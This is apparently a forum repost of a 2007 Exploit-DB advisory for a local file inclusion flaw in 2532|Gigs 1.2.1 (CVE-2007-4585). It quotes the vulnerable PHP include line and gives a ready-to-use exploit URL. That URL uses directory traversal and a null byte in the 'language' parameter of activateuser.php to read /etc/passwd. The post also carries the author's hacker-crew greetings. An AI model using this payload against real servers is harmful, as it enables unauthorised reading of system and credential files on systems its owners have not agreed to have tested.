Exploit 2532/Gigs 1.2.1 - 'activateuser.php' Local File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
4317
Проверка EDB
  1. Пройдено
Автор
BD0RK
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-4585
Дата публикации
2007-08-26
Код:
            -°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°

             2532|Gigs 1.2.1 (activateuser.php) Local File Inclusion Vulnerability

                              Discovered by bd0rk || SOH-Crew

                                    www.soh-crew.it.tt

                         The german Coding and IT-Security Ressource

             -°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°


Vendor: http://www.2532gigs.com

Download: http://belnet.dl.sourceforge.net/sourceforge/gigs-2532/2532Gigs_1.2.1_stable.zip

License: Free

Vulnerable Code: include_once("languages/$language/settings.php");



Exploit: http://[h0sT]/[dir]/activateuser.php?language=../../../../../../../../etc/passwd%00



Greetings: str0ke, TheJT, GolD_M, die steffi, khaliDb, x0r_32


####The 18 years old, german Hacker bd0rk####

# milw0rm.com [2007-08-26]
 
Источник
www.exploit-db.com